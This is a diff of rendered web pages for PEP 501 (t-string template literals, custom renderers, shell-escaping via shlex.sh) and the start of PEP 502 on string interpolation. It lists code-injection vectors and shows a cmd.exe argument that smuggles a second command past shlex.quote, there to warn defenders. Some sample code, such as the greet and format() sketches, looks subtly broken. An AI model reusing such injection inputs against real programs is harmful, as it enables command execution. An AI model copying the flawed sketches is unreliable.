+        try:
+            factor = operator.index(other)
+        except TypeError:
+            return NotImplemented
+        if not self or factor == 1:
+            return self
+        if factor < 1:
+            return TemplateLiteral("")
+        repeated_text = self._raw_template * factor
+        repeated_segments = self._segments * factor
+        return TemplateLiteral(repeated_text, *repeated_segments)
+    __rmul__ = __mul__
+
+
+

(Note: this is an illustrative example implementation, the exact compile time construction +method and internal data management details of types.TemplateLiteral are considered an +implementation detail not specified by the PEP. However, the expected post-construction +behaviour of the public APIs on types.TemplateLiteral instances is specified by the +above code, as is the constructor signature for building template instances at runtime)

+

The result of a template literal expression is an instance of this +type, rather than an already rendered string. Rendering only takes +place when the instance’s render method is called (either directly, or +indirectly via __format__).

+

The compiler will pass the following details to the template literal for +later use:

+
    +
  • a string containing the raw template as written in the source code
  • +
  • a sequence of template segments, with each segment being either:
      +
    • a literal text segment (a regular Python string that also provides access +to its raw form)
    • +
    • a parsed template interpolation field, specifying the text of the interpolated +expression (as a regular string), its evaluated result, the format specifier text +(with any substitution fields eagerly evaluated as an f-string), and the conversion +specifier text (as a regular string)
    • +
    +
  • +
+

The raw template is just the template literal as a string. By default, +it is used to provide a human-readable representation for the +template literal, but template renderers may also use it for other purposes (e.g. as a +cache lookup key).

+

The parsed template structure is taken from PEP 750 and consists of a sequence of +template segments corresponding to the text segments and interpolation fields in the +template string.

+

This approach is designed to allow compilers to fully process each segment of the template +in order, before finally emitting code to pass all of the template segments to the template +literal constructor.

+

For example, assuming the following runtime values:

+
names = ["Alice", "Bob", "Carol", "Eve"]
+field_width = 10
+def expressions():
+    return 42
+
+
+

The template from the proposal section would be represented at runtime as:

+
TemplateLiteral(
+    r"Substitute {names:>{field_width}} and {expressions()!r} at runtime",
+    TemplateLiteralText(r"Substitute "),
+    TemplateLiteralField("names", ["Alice", "Bob", "Carol", "Eve"], ">10", ""),
+    TemplateLiteralText(r" and "),
+    TemplateLiteralField("expressions()", 42, "", "r"),
+)
+
+
+
+

Rendering templates

+

The TemplateLiteral.render implementation defines the rendering +process in terms of the following renderers:

+
    +
  • an overall render_template operation that defines how the sequence of +rendered text and field segments are composed into a fully rendered result. +The default template renderer is string concatenation using ''.join.
  • +
  • a per text segment render_text operation that receives the individual literal +text segments within the template. The default text renderer is the builtin str +constructor.
  • +
  • a per field segment render_field operation that receives the field value, format +specifier, and conversion specifier for substitution fields within the template. The +default field renderer is the format() builtin.
  • +
+

Given the parsed template representation above, the semantics of template rendering would +then be equivalent to the following:

+
def render(self, *, render_template=''.join, render_text=str, render_field=format):
+    rendered_segments = []
+    for segment in self._segments:
+        match segment:
+            case TemplateLiteralText() as text_segment:
+                rendered_segments.append(render_text(text_segment))
+            case TemplateLiteralField() as field_segment:
+                rendered_segments.append(render_field(*field_segment[1:]))
+    return render_template(rendered_segments)
+
+
+
+
+

Format specifiers

+

The syntax and processing of field specifiers in t-strings is defined to be the same as it +is for f-strings.

+

This includes allowing field specifiers to themselves contain f-string substitution fields. +The raw text of the field specifiers (without processing any substitution fields) is +retained as part of the full raw template string.

+

The parsed field specifiers receive the field specifier string with those substitutions +already resolved. The : prefix is also omitted.

+

Aside from separating them out from the substitution expression during parsing, +format specifiers are otherwise treated as opaque strings by the interpolation +template parser - assigning semantics to those (or, alternatively, +prohibiting their use) is handled at rendering time by the field renderer.

+
+
+

Conversion specifiers

+

In addition to the existing support for a, r, and s conversion specifiers, +str.format() and str.format_map() will be updated to accept () as a +conversion specifier that means “call the interpolated value”.

+

Where PEP 701 restricts conversion specifiers to NAME tokens, this PEP will instead +allow FSTRING_MIDDLE tokens (such that only {, } and : are disallowed). This +change is made primarily to support lazy field rendering with the !() conversion +specifier, but also allows custom rendering functions more flexibility when defining their +own conversion specifiers in preference to those defined for the default format() field +renderer.

+

Conversion specifiers are still handled as plain strings, and do NOT support the use +of substitution fields.

+

The parsed conversion specifiers receive the conversion specifier string with the +! prefix omitted.

+

To allow custom template renderers to define their own custom conversion specifiers without +causing the default renderer to fail, conversion specifiers will be permitted to contain a +custom suffix prefixed with a second ! character. That is, !!<custom>, +!a!<custom>, !r!<custom>, !s!<custom>, and !()!<custom> would all be +valid conversion specifiers in a template literal.

+

As described above, the default rendering supports the original !a, !r and !s +conversion specifiers defined in PEP 3101, together with the new !() lazy field +evaluation conversion specifier defined in this PEP. The default rendering ignores any +custom conversion specifier suffixes.

+

The full mapping between the standard conversion specifiers and the special methods called +on the interpolated value when the field is rendered:

+
    +
  • No conversion (empty string): __format__ (with format specifier as parameter)
  • +
  • a: __repr__ (as per the ascii() builtin)
  • +
  • r: __repr__ (as per the repr() builtin)
  • +
  • s: __str__ (as per the str builtin)
  • +
  • (): __call__ (with no parameters)
  • +
+

When a conversion occurs, __format__ (with the format specifier) is called on the result +of the conversion rather than being called on the original object.

+

The changes to format() and the addition of operator.convert_field() make it +straightforward for custom renderers to also support the standard conversion specifiers.

+

f-strings themselves will NOT support the new !() conversion specifier (as it is +redundant when value interpolation and value rendering always occur at the same time). They +also will NOT support the use of custom conversion specifiers (since the rendering function +is known at compile time and doesn’t make use of the custom specifiers).

+
+
+

New field conversion API in the operator module

+

To support application of the standard conversion specifiers in custom template rendering +functions, a new operator.convert_field() function will be added:

+
def convert_field(value, conversion_spec=''):
+    """Apply the given string formatting conversion specifier to the given value"""
+    std_spec, sep, custom_spec = conversion_spec.partition("!")
+    match std_spec:
+        case '':
+            return value
+        case 'a':
+            return ascii(value)
+        case 'r':
+            return repr(value)
+        case 's':
+            return str(value)
+        case '()':
+            return value()
+    if not sep:
+        err = f"Invalid conversion specifier {std_spec!r}"
+    else:
+        err = f"Invalid conversion specifier {std_spec!r} in {conversion_spec!r}"
+    raise ValueError(f"{err}: expected '', 'a', 'r', 's' or '()')
+
+
+
+
+

Conversion specifier parameter added to format()

+

The signature and behaviour of the format() builtin will be updated:

+
def format(value, format_spec='', conversion_spec=''):
+    if conversion_spec:
+        value_to_format = operator.convert_field(value)
+    else:
+        value_to_format = value
+    return type(value_to_format).__format__(value, format_spec)
+
+
+

If a non-empty conversion specifier is given, the value will be converted with +operator.convert_field() before looking up the __format__ method.

+

The signature of the __format__ special method does NOT change (only format specifiers +are handled by the object being formatted).

+
+
+

Structural typing and duck typing

+

To allow custom renderers to accept alternative interpolation template implementations +(rather than being tightly coupled to the native template literal types), the +following structural protocols will be added to the typing module:

+
@runtime_checkable
+class TemplateText(Protocol):
+    # Renamed version of PEP 750's Decoded protocol
+    def __str__(self) -> str:
+        ...
+
+    raw: str
+
+@runtime_checkable
+class TemplateField(Protocol):
+    # Renamed and modified version of PEP 750's Interpolation protocol
+    def __len__(self):
+        ...
+
+    def __getitem__(self, index: int):
+        ...
+
+    def __str__(self) -> str:
+        ...
+
+    expr: str
+    value: Any
+    format_spec: str | None = None
+    conversion_spec: str | None = None
+
+@runtime_checkable
+class InterpolationTemplate(Protocol):
+    # Corresponds to PEP 750's Template protocol
+    def __iter__(self) -> Iterable[TemplateText|TemplateField]:
+        ...
+
+    raw_template: str
+
+
+

Note that the structural protocol APIs are substantially narrower than the full +implementation APIs defined for TemplateLiteralText, TemplateLiteralField, +and TemplateLiteral.

+

Code that wants to accept interpolation templates and define specific handling for them +without introducing a dependency on the typing module, or restricting the code to +handling the concrete template literal types, should instead perform an attribute +existence check on raw_template.

+
+
+

Writing custom renderers

+

Writing a custom renderer doesn’t require any special syntax. Instead, +custom renderers are ordinary callables that process an interpolation +template directly either by calling the render() method with alternate +render_template, render_text, and/or render_field implementations, or by +accessing the template’s data attributes directly.

+

For example, the following function would render a template using objects’ +repr implementations rather than their native formatting support:

+
def repr_format(template):
+    def render_field(value, format_spec, conversion_spec):
+        converted_value = operator.convert_field(value, conversion_spec)
+        return format(repr(converted_value), format_spec)
+    return template.render(render_field=render_field)
+
+
+

The customer renderer shown respects the conversion specifiers in the original template, but +it is also possible to ignore them and render the interpolated values directly:

+
def input_repr_format(template):
+    def render_field(value, format_spec, __):
+        return format(repr(value), format_spec)
+    return template.render(render_field=render_field)
+
+
+

When writing custom renderers, note that the return type of the overall +rendering operation is determined by the return type of the passed in render_template +callable. While this will still be a string for formatting related use cases, producing +non-string objects is permitted. For example, a custom SQL +template renderer could involve an sqlalchemy.sql.text call that produces an +SQL Alchemy query object. +A subprocess invocation related template renderer could produce a string sequence suitable +for passing to subprocess.run, or it could even call subprocess.run directly, and +return the result.

+

Non-strings may also be returned from render_text and render_field, as long as +they are paired with a render_template implementation that expects that behaviour.

+

Custom renderers using the pattern matching style described in PEP 750 are also supported:

+
# Use the structural typing protocols rather than the concrete implementation types
+from typing import InterpolationTemplate, TemplateText, TemplateField
+
+def greet(template: InterpolationTemplate) -> str:
+    """Render an interpolation template using structural pattern matching."""
+    result = []
+    for segment in template:
+        match segment:
+            match segment:
+                case TemplateText() as text_segment:
+                    result.append(text_segment)
+                case TemplateField() as field_segment:
+                    result.append(str(field_segment).upper())
+    return f"{''.join(result)}!"
+
+
+
+
+

Expression evaluation

+

As with f-strings, the subexpressions that are extracted from the interpolation +template are evaluated in the context where the template literal +appears. This means the expression has full access to local, nonlocal and global variables. +Any valid Python expression can be used inside {}, including +function and method calls.

+

Because the substitution expressions are evaluated where the string appears in +the source code, there are no additional security concerns related to the +contents of the expression itself, as you could have also just written the +same expression and used runtime field parsing:

+
>>> bar=10
+>>> def foo(data):
+...   return data + 20
+...
+>>> str(t'input={bar}, output={foo(bar)}')
+'input=10, output=30'
+
+
+

Is essentially equivalent to:

+
>>> 'input={}, output={}'.format(bar, foo(bar))
+'input=10, output=30'
+
+
+
+
+

Handling code injection attacks

+

The PEP 498 formatted string syntax makes it potentially attractive to write +code like the following:

+
runquery(f"SELECT {column} FROM {table};")
+runcommand(f"cat {filename}")
+return_response(f"<html><body>{response.body}</body></html>")
+
+
+

These all represent potential vectors for code injection attacks, if any of the +variables being interpolated happen to come from an untrusted source. The +specific proposal in this PEP is designed to make it straightforward to write +use case specific renderers that take care of quoting interpolated values +appropriately for the relevant security context:

+
runquery(sql(t"SELECT {column} FROM {table} WHERE column={value};"))
+runcommand(sh(t"cat {filename}"))
+return_response(html(t"<html><body>{response.body}</body></html>"))
+
+
+

This PEP does not cover adding all such renderers to the standard library +immediately (though one for shell escaping is proposed), but rather proposes to ensure +that they can be readily provided by third party libraries, and potentially incorporated +into the standard library at a later date.

+

Over time, it is expected that APIs processing potentially dangerous string inputs may be +updated to accept interpolation templates natively, allowing problematic code examples to +be fixed simply by replacing the f string prefix with a t:

+
runquery(t"SELECT {column} FROM {table};")
+runcommand(t"cat {filename}")
+return_response(t"<html><body>{response.body}</body></html>")
+
+
+

It is proposed that a renderer is included in the shlex module, aiming to offer a +more POSIX shell style experience for accessing external programs, without the significant +risks posed by running os.system or enabling the system shell when using the +subprocess module APIs. This renderer will provide an interface for running external +programs inspired by that offered by the +Julia programming language, +only with the backtick based \`cat $filename\` syntax replaced by t"cat {filename}" +style template literals. See more in the Renderer for shell escaping added to shlex section.

+
+
+

Error handling

+

Either compile time or run time errors can occur when processing interpolation +expressions. Compile time errors are limited to those errors that can be +detected when parsing a template string into its component tuples. These +errors all raise SyntaxError.

+

Unmatched braces:

+
>>> t'x={x'
+  File "<stdin>", line 1
+      t'x={x'
+         ^
+SyntaxError: missing '}' in template literal expression
+
+
+

Invalid expressions:

+
>>> t'x={!x}'
+  File "<fstring>", line 1
+    !x
+    ^
+SyntaxError: invalid syntax
+
+
+

Run time errors occur when evaluating the expressions inside a +template string before creating the template literal object. See PEP 498 +for some examples.

+

Different renderers may also impose additional runtime +constraints on acceptable interpolated expressions and other formatting +details, which will be reported as runtime exceptions.

+
+
+

Renderer for shell escaping added to shlex

+

As a reference implementation, a renderer for safe POSIX shell escaping can be added to +the shlex module. This renderer would be called sh and would be equivalent to +calling shlex.quote on each field value in the template literal.

+

Thus:

+
os.system(shlex.sh(t'cat {myfile}'))
+
+
+

would have the same behavior as:

+
os.system('cat ' + shlex.quote(myfile)))
+
+
+

The implementation would be:

+
def sh(template: TemplateLiteral):
+    def render_field(value, format_spec, conversion_spec)
+        field_text = format(value, format_spec, conversion_spec)
+        return quote(field_text)
+    return template.render(render_field=render_field)
+
+
+

The addition of shlex.sh will NOT change the existing admonishments in the +subprocess documentation that passing shell=True is best avoided, nor the +reference from the os.system() documentation the higher level subprocess APIs.

+
+
+

Changes to subprocess module

+

With the additional renderer in the shlex module, and the addition of template literals, +the subprocess module can be changed to handle accepting template literals +as an additional input type to Popen, as it already accepts a sequence, or a string, +with different behavior for each.

+

With the addition of template literals, subprocess.Popen (and in return, all its +higher level functions such as subprocess.run()) could accept strings in a safe way +(at least on POSIX systems).

+

For example:

+
subprocess.run(t'cat {myfile}', shell=True)
+
+
+

would automatically use the shlex.sh renderer provided in this PEP. Therefore, using +shlex inside a subprocess.run call like so:

+
subprocess.run(shlex.sh(t'cat {myfile}'), shell=True)
+
+
+

would be redundant, as run would automatically render any template literals +through shlex.sh

+

Alternatively, when subprocess.Popen is run without shell=True, it could still +provide subprocess with a more ergonomic syntax. For example:

+
subprocess.run(t'cat {myfile} --flag {value}')
+
+
+

would be equivalent to:

+
subprocess.run(['cat', myfile, '--flag', value])
+
+
+

or, more accurately:

+
subprocess.run(shlex.split(f'cat {shlex.quote(myfile)} --flag {shlex.quote(value)}'))
+
+
+

It would do this by first using the shlex.sh renderer, as above, then using +shlex.split on the result.

+

The implementation inside subprocess.Popen._execute_child would look like:

+
if hasattr(args, "raw_template"):
+    import shlex
+    if shell:
+        args = [shlex.sh(args)]
+    else:
+        args = shlex.split(shlex.sh(args))
+
+
+
+
+
+

How to Teach This

+

This PEP intentionally includes two standard renderers that will always be available in +teaching environments: the format() builtin and the new shlex.sh POSIX shell +renderer.

+

Together, these two renderers can be used to build an initial understanding of delayed +rendering on top of a student’s initial introduction to string formatting with f-strings. +This initial understanding would have the goal of allowing students to use template +literals effectively, in combination with pre-existing template rendering functions.

+

For example, f"{'some text'}", f"{value}", f"{value!r}", , f"{callable()}" +could all be introduced.

+

Those same operations could then be rewritten as format(t"{'some text'}"), +format(t"{value}"), format(t"{value!r}"), , format(t"{callable()}") to +illustrate the relationship between the eager rendering form and the delayed rendering +form.

+

The difference between “template definition time” (or “interpolation time” ) and +“template rendering time” can then be investigated further by storing the template literals +as local variables and looking at their representations separately from the results of the +format calls. At this point, the t"{callable!()}" syntax can be introduced to +distinguish between field expressions that are called at template definition time and those +that are called at template rendering time.

+

Finally, the differences between the results of f"{'some text'}", +format(t"{'some text'}"), and shlex.sh(t"{'some text'}") could be explored to +illustrate the potential for differences between the default rendering function and custom +rendering functions.

+

Actually defining your own custom template rendering functions would then be a separate more +advanced topic (similar to the way students are routinely taught to use decorators and +context managers well before they learn how to write their own custom ones).

+

PEP 750 includes further ideas for teaching aspects of the delayed rendering topic.

+
+
+

Discussion

+

Refer to PEP 498 for previous discussion, as several of the points there +also apply to this PEP. PEP 750’s design discussions are also highly relevant, +as that PEP inspired several aspects of the current design.

+
+

Support for binary interpolation

+

As f-strings don’t handle byte strings, neither will t-strings.

+
+
+

Interoperability with str-only interfaces

+

For interoperability with interfaces that only accept strings, interpolation +templates can still be prerendered with format(), rather than delegating the +rendering to the called function.

+

This reflects the key difference from PEP 498, which always eagerly applies +the default rendering, without any way to delegate the choice of renderer to +another section of the code.

+
+
+

Preserving the raw template string

+

Earlier versions of this PEP failed to make the raw template string available +on the template literal. Retaining it makes it possible to provide a more +attractive template representation, as well as providing the ability to +precisely reconstruct the original string, including both the expression text +and the details of any eagerly rendered substitution fields in format specifiers.

+
+
+

Creating a rich object rather than a global name lookup

+

Earlier versions of this PEP used an __interpolate__ builtin, rather than +creating a new kind of object for later consumption by interpolation +functions. Creating a rich descriptive object with a useful default renderer +made it much easier to support customisation of the semantics of interpolation.

+
+
+

Building atop f-strings rather than replacing them

+

Earlier versions of this PEP attempted to serve as a complete substitute for +PEP 498 (f-strings) . With the acceptance of that PEP and the more recent PEP 701, +this PEP can instead build a more flexible delayed rendering capability +on top of the existing f-string eager rendering.

+

Assuming the presence of f-strings as a supporting capability simplified a +number of aspects of the proposal in this PEP (such as how to handle substitution +fields in format specifiers).

+
+
+

Defining repetition and concatenation semantics

+

This PEP explicitly defines repetition and concatenation semantics for TemplateLiteral +and TemplateLiteralText. While not strictly necessary, defining these is expected +to make the types easier to work with in code that historically only supported regular +strings.

+
+
+

New conversion specifier for lazy field evaluation

+

The initially published version of PEP 750 defaulted to lazy evaluation for all +interpolation fields. While it was subsequently updated to default to eager evaluation +(as happens for f-strings and this PEP), the discussions around the topic prompted the idea +of providing a way to indicate to rendering functions that the interpolated field value +should be called at rendering time rather than being used without modification.

+

Since PEP 750 also deferred the processing of conversion specifiers until evaluation time, +the suggestion was put forward that invoking __call__ without arguments could be seen +as similar to the existing conversion specifiers that invoke __repr__ (!a, !r) +or __str__ (!s).

+

Accordingly, this PEP was updated to also make conversion specifier processing the +responsibility of rendering functions, and to introduce !() as a new conversion +specifier for lazy evaluation.

+

Adding operator.convert_field() and updating the format() builtin was than +a matter of providing appropriate support to rendering function implementations that +wanted to accept the default conversion specifiers.

+
+
+

Allowing arbitrary conversion specifiers in custom renderers

+

Accepting !() as a new conversion specifier necessarily requires updating the syntax +that the parser accepts for conversion specifiers (they are currently restricted to +identifiers). This then raised the question of whether t-string compilation should enforce +the additional restriction that f-string compilation imposes: that the conversion specifier +be exactly one of !a, !r, or !s.

+

With t-strings already being updated to allow !() when compiled, it made sense to treat +conversion specifiers as relating to rendering function similar to the way that format +specifiers related to the formatting of individual objects: aside from some characters that +are excluded for parsing reasons, they are otherwise free text fields with the meaning +decided by the consuming function or object. This reduces the temptation to introduce +renderer specific metaformatting into the template’s format specifiers (since any +renderer specific information can be placed in the conversion specifier instead).

+
+
+

Only reserving a single new string prefix

+

The primary difference between this PEP and PEP 750 is that the latter aims to enable +the use of arbitrary string prefixes, rather than requiring the creation of template +literal instances that are then passed to other APIs. For example, PEP 750 would allow +the sh render described in this PEP to be used as sh"cat {somefile}" rather than +requiring the template literal to be created explicitly and then passed to a regular +function call (as in sh(t"cat {somefile}")).

+

The main reason the PEP authors prefer the second spelling is because it makes it clearer +to a reader what is going on: a template literal instance is being created, and then +passed to a callable that knows how to do something useful with interpolation template +instances.

+

A draft proposal +from one of the PEP 750 authors also suggests that static typecheckers will be able +to infer the use of particular domain specific languages just as readily from the form +that uses an explicit function call as they would be able to infer it from a directly +tagged string.

+

With the tagged string syntax at least arguably reducing clarity for human readers without +increasing the overall expressiveness of the construct, it seems reasonable to start with +the smallest viable proposal (a single new string prefix), and then revisit the potential +value of generalising to arbitrary prefixes in the future.

+

As a lesser, but still genuine, consideration, only using a single new string prefix for +this use case leaves open the possibility of defining alternate prefixes in the future that +still produce TemplateLiteral objects, but use a different syntax within the string to +define the interpolation fields (see the i18n discussion below).

+
+
+

Deferring consideration of more concise delayed evaluation syntax

+

During the discussions of delayed evaluation, {-> expr} was +suggested +as potential syntactic sugar for the already supported lambda based syntax: +{(lambda: expr)} (the parentheses are required in the existing syntax to avoid +misinterpretation of the : character as indicating the start of the format specifier).

+

While adding such a spelling would complement the rendering time function call syntax +proposed in this PEP (that is, writing {-> expr!()} to evaluate arbitrary expressions +at rendering time), it is a topic that the PEP authors consider to be better left to a +future PEP if this PEP or PEP 750 is accepted.

+
+
+

Deferring consideration of possible logging integration

+

One of the challenges with the logging module has been that we have previously +been unable to devise a reasonable migration strategy away from the use of +printf-style formatting. While the logging module does allow formatters to specify the +use of str.format() or string.Template style substitution, it can be awkward +to ensure that messages written that way are only ever processed by log record formatters +that are expecting that syntax.

+

The runtime parsing and interpolation overhead for logging messages also poses a problem +for extensive logging of runtime events for monitoring purposes.

+

While beyond the scope of this initial PEP, template literal support +could potentially be added to the logging module’s event reporting APIs, +permitting relevant details to be captured using forms like:

+
logging.debug(t"Event: {event}; Details: {data}")
+logging.critical(t"Error: {error}; Details: {data}")
+
+
+

Rather than the historical mod-formatting style:

+
logging.debug("Event: %s; Details: %s", event, data)
+logging.critical("Error: %s; Details: %s", event, data)
+
+
+

As the template literal is passed in as an ordinary argument, other +keyword arguments would also remain available:

+
logging.critical(t"Error: {error}; Details: {data}", exc_info=True)
+
+
+

The approach to standardising lazy field evaluation described in this PEP is +primarily based on the anticipated needs of this hypothetical integration into +the logging module:

+
logging.debug(t"Eager evaluation of {expensive_call()}")
+logging.debug(t"Lazy evaluation of {expensive_call!()}")
+
+logging.debug(t"Eager evaluation of {expensive_call_with_args(x, y, z)}")
+logging.debug(t"Lazy evaluation of {(lambda: expensive_call_with_args(x, y, z))!()}")
+
+
+

It’s an open question whether the definition of logging formatters would be updated to +support template strings, but if they were, the most likely way of defining fields which +should be looked up on the log record instead of being +interpreted eagerly is simply to escape them so they’re available as part of the literal +text:

+
proc_id = get_process_id()
+formatter = logging.Formatter(t"{{asctime}}:{proc_id}:{{name}}:{{levelname}}{{message}}")
+
+
+
+
+

Deferring consideration of possible use in i18n use cases

+

The initial motivating use case for this PEP was providing a cleaner syntax +for i18n (internationalization) translation, as that requires access to the original +unmodified template. As such, it focused on compatibility with the substitution syntax +used in Python’s string.Template formatting and Mozilla’s l20n project.

+

However, subsequent discussion revealed there are significant additional +considerations to be taken into account in the i18n use case, which don’t +impact the simpler cases of handling interpolation into security sensitive +contexts (like HTML, system shells, and database queries), or producing +application debugging messages in the preferred language of the development +team (rather than the native language of end users).

+

Due to that realisation, the PEP was switched to use the str.format() substitution +syntax originally defined in PEP 3101 and subsequently used as the basis for PEP 498.

+

While it would theoretically be possible to update string.Template to support +the creation of instances from native template literals, and to implement the structural +typing.Template protocol, the PEP authors have not identified any practical benefit +in doing so.

+

However, one significant benefit of the “only one string prefix” approach used in this PEP +is that while it generalises the existing f-string interpolation syntax to support delayed +rendering through t-strings, it doesn’t imply that that should be the only compiler +supported interpolation syntax that Python should ever offer.

+

Most notably, it leaves the door open to an alternate “t$-string” syntax that would allow +TemplateLiteral instances to be created using a PEP 292 based interpolation syntax +rather than a PEP 3101 based syntax:

+
+
template = t$”Substitute $words and ${other_values} at runtime”
+

The only runtime distinction between templates created that way and templates created from +regular t-strings would be in the contents of their raw_template attributes.

+
+
+

Deferring escaped rendering support for non-POSIX shells

+

shlex.quote() works by classifying the regex character set [\w@%+=:,./-] to be +safe, deeming all other characters to be unsafe, and hence requiring quoting of the string +containing them. The quoting mechanism used is then specific to the way that string quoting +works in POSIX shells, so it cannot be trusted when running a shell that doesn’t follow +POSIX shell string quoting rules.

+

For example, running subprocess.run(f'echo {shlex.quote(sys.argv[1])}', shell=True) is +safe when using a shell that follows POSIX quoting rules:

+
$ cat > run_quoted.py
+import sys, shlex, subprocess
+subprocess.run(f"echo {shlex.quote(sys.argv[1])}", shell=True)
+$ python3 run_quoted.py pwd
+pwd
+$ python3 run_quoted.py '; pwd'
+; pwd
+$ python3 run_quoted.py "'pwd'"
+'pwd'
+
+
+

but remains unsafe when running a shell from Python invokes cmd.exe (or Powershell):

+
S:\> echo import sys, shlex, subprocess > run_quoted.py
+S:\> echo subprocess.run(f"echo {shlex.quote(sys.argv[1])}", shell=True) >> run_quoted.py
+S:\> type run_quoted.py
+import sys, shlex, subprocess
+subprocess.run(f"echo {shlex.quote(sys.argv[1])}", shell=True)
+S:\> python3 run_quoted.py "echo OK"
+'echo OK'
+S:\> python3 run_quoted.py "'& echo Oh no!"
+''"'"'
+Oh no!'
+
+
+

Resolving this standard library limitation is beyond the scope of this PEP.

+
+
+
+

Acknowledgements

+
    +
  • Eric V. Smith for creating PEP 498 and demonstrating the feasibility of +arbitrary expression substitution in string interpolation
  • +
  • The authors of PEP 750 for the substantial design improvements that tagged strings +inspired for this PEP, their general advocacy for the value of language level delayed +template rendering support, and their efforts to ensure that any native interpolation +template support lays a strong foundation for future efforts in providing robust syntax +highlighting and static type checking support for domain specific languages
  • +
  • Barry Warsaw, Armin Ronacher, and Mike Miller for their contributions to +exploring the feasibility of using this model of delayed rendering in i18n +use cases (even though the ultimate conclusion was that it was a poor fit, +at least for current approaches to i18n in Python)
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0501.rst

+

Last modified: 2024-10-19 14:00:43 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0502/index.html b/pep-0502/index.html new file mode 100644 index 00000000000..d0ff9d27f4e --- /dev/null +++ b/pep-0502/index.html @@ -0,0 +1,830 @@ + + + + + + + + PEP 502 – String Interpolation - Extended Discussion | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 502 – String Interpolation - Extended Discussion

+
+
Author:
+
Mike G. Miller
+
Status:
+
Rejected
+
Type:
+
Informational
+
Created:
+
10-Aug-2015
+
Python-Version:
+
3.6
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 498: Literal String Interpolation, which proposed “formatted strings” was +accepted September 9th, 2015. +Additional background and rationale given during its design phase is detailed +below.

+

To recap that PEP, +a string prefix was introduced that marks the string as a template to be +rendered. +These formatted strings may contain one or more expressions +built on the existing syntax of str.format(). [10] [11] +The formatted string expands at compile-time into a conventional string format +operation, +with the given expressions from its text extracted and passed instead as +positional arguments.

+

At runtime, +the resulting expressions are evaluated to render a string to given +specifications:

+
>>> location = 'World'
+>>> f'Hello, {location} !'      # new prefix: f''
+'Hello, World !'                # interpolated result
+
+
+

Format-strings may be thought of as merely syntactic sugar to simplify traditional +calls to str.format().

+
+
+

PEP Status

+

This PEP was rejected based on its using an opinion-based tone rather than a factual one. +This PEP was also deemed not critical as PEP 498 was already written and should be the place +to house design decision details.

+
+
+

Motivation

+

Though string formatting and manipulation features are plentiful in Python, +one area where it falls short +is the lack of a convenient string interpolation syntax. +In comparison to other dynamic scripting languages +with similar use cases, +the amount of code necessary to build similar strings is substantially higher, +while at times offering lower readability due to verbosity, dense syntax, +or identifier duplication.

+

These difficulties are described at moderate length in the original +post to python-ideas +that started the snowball (that became PEP 498) rolling. [1]

+

Furthermore, replacement of the print statement with the more consistent print +function of Python 3 (PEP 3105) has added one additional minor burden, +an additional set of parentheses to type and read. +Combined with the verbosity of current string formatting solutions, +this puts an otherwise simple language at an unfortunate disadvantage to its +peers:

+
echo "Hello, user: $user, id: $id, on host: $hostname"              # bash
+say  "Hello, user: $user, id: $id, on host: $hostname";             # perl
+puts "Hello, user: #{user}, id: #{id}, on host: #{hostname}\n"      # ruby
+                                                                    # 80 ch -->|
+# Python 3, str.format with named parameters
+print('Hello, user: {user}, id: {id}, on host: {hostname}'.format(**locals()))
+
+# Python 3, worst case
+print('Hello, user: {user}, id: {id}, on host: {hostname}'.format(user=user,
+                                                                  id=id,
+                                                                  hostname=
+                                                                    hostname))
+
+
+

In Python, the formatting and printing of a string with multiple variables in a +single line of code of standard width is noticeably harder and more verbose, +with indentation exacerbating the issue.

+

For use cases such as smaller projects, systems programming, +shell script replacements, and even one-liners, +where message formatting complexity has yet to be encapsulated, +this verbosity has likely lead a significant number of developers and +administrators to choose other languages over the years.

+
+
+

Rationale

+
+

Goals

+

The design goals of format strings are as follows:

+
    +
  1. Eliminate need to pass variables manually.
  2. +
  3. Eliminate repetition of identifiers and redundant parentheses.
  4. +
  5. Reduce awkward syntax, punctuation characters, and visual noise.
  6. +
  7. Improve readability and eliminate mismatch errors, +by preferring named parameters to positional arguments.
  8. +
  9. Avoid need for locals() and globals() usage, +instead parsing the given string for named parameters, +then passing them automatically. [2] [3]
  10. +
+
+
+

Limitations

+

In contrast to other languages that take design cues from Unix and its +shells, +and in common with Javascript, +Python specified both single (') and double (") ASCII quote +characters to enclose strings. +It is not reasonable to choose one of them now to enable interpolation, +while leaving the other for uninterpolated strings. +Other characters, +such as the “Backtick” (or grave accent `) are also +constrained by history +as a shortcut for repr().

+

This leaves a few remaining options for the design of such a feature:

+
    +
  • An operator, as in printf-style string formatting via %.
  • +
  • A class, such as string.Template().
  • +
  • A method or function, such as str.format().
  • +
  • New syntax, or
  • +
  • A new string prefix marker, such as the well-known r'' or u''.
  • +
+

The first three options above are mature. +Each has specific use cases and drawbacks, +yet also suffer from the verbosity and visual noise mentioned previously. +All options are discussed in the next sections.

+
+
+

Background

+

Formatted strings build on several existing techniques and proposals and what +we’ve collectively learned from them. +In keeping with the design goals of readability and error-prevention, +the following examples therefore use named, +not positional arguments.

+

Let’s assume we have the following dictionary, +and would like to print out its items as an informative string for end users:

+
>>> params = {'user': 'nobody', 'id': 9, 'hostname': 'darkstar'}
+
+
+
+

Printf-style formatting, via operator

+

This venerable technique continues to have its uses, +such as with byte-based protocols, +simplicity in simple cases, +and familiarity to many programmers:

+
>>> 'Hello, user: %(user)s, id: %(id)s, on host: %(hostname)s' % params
+'Hello, user: nobody, id: 9, on host: darkstar'
+
+
+

In this form, considering the prerequisite dictionary creation, +the technique is verbose, a tad noisy, +yet relatively readable. +Additional issues are that an operator can only take one argument besides the +original string, +meaning multiple parameters must be passed in a tuple or dictionary. +Also, it is relatively easy to make an error in the number of arguments passed, +the expected type, +have a missing key, +or forget the trailing type, e.g. (s or d).

+
+
+

string.Template Class

+

The string.Template class from PEP 292 +(Simpler String Substitutions) +is a purposely simplified design, +using familiar shell interpolation syntax, +with safe-substitution feature, +that finds its main use cases in shell and internationalization tools:

+
Template('Hello, user: $user, id: ${id}, on host: $hostname').substitute(params)
+
+
+

